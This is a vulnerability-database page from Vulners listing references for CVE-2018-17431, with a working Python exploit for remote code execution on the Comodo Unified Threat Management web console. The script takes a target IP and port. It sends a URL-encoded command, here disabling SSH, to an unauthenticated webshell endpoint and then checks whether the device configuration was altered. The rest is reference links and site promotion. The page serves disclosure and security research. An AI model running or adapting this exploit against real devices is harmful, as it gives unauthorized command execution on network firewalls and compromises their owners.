Vulners
Lucene search
Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2018-17431 | 14 Nov 202406:07 | – | circl |
 | CVE-2018-17431 | 29 Jan 201923:00 | – | cve |
 | CVE-2018-17431 | 29 Jan 201923:00 | – | cvelist |
 | Exploit for Improper Authentication in Comodo Unified_Threat_Management_Firewall | 8 Dec 201807:47 | – | githubexploit |
 | Comodo Unified Threat Management Web Console - Remote Code Execution | 1 Jun 202605:38 | – | nuclei |
 | CVE-2018-17431 | 30 Jan 201915:29 | – | nvd |
 | CVE-2018-17431 | 30 Jan 201915:29 | – | osv |
 | Comodo Unified Threat Management Web Console 2.7.0 Remote Code Execution | 22 Sep 202000:00 | – | packetstorm |
 | Authentication flaw | 30 Jan 201915:29 | – | prion |
 | PT-2019-9479 · Comodo · Comodo Utm Firewall | 29 Jan 201900:00 | – | ptsecurity |
10
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution
# Date: 2018-08-15
# Exploit Author: Milad Fadavvi
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/
# Vendor Homepage: https://www.comodo.com/
# Version: Releases before 2.7.0 & 1.5.0
# Tested on: Windows=Firefox/chrome - Kali=firefox
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC
# CVE : CVE-2018-17431
# CVE-detailes: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8
import requests
def RndInt(Lenght):
from random import choice
from string import digits
RandonInt = ''.join([choice(digits) for n in range(Lenght)])
return str(RandonInt)
if __name__ == "__main__":
IP = input("IP: ")
Port = input("Port: ")
Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH
'''For more info about command try to read manual of spesefic version of Comodo UTM and
exploit PoC (https://github.com/Fadavvi/CVE-2018-17431-PoC)
'''
BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
BaseNComdURL = BaseURL + "&k=" + Command
LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
FullURL = BaseNComdURL + LastPart
AddetionalEnter = BaseURL + "&k=%0a" + LastPart
try:
FirstResponse = requests.get(FullURL).text
except:
print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
exit(1)
SecondResponse = requests.get(AddetionalEnter).text
if SecondResponse.find("Configuration has been altered") == -1:
print("\nExploit Failed!\n")
exit(1)
else:
print("\nOK! Command Ran!\n")
exit(0)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 2020 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.92083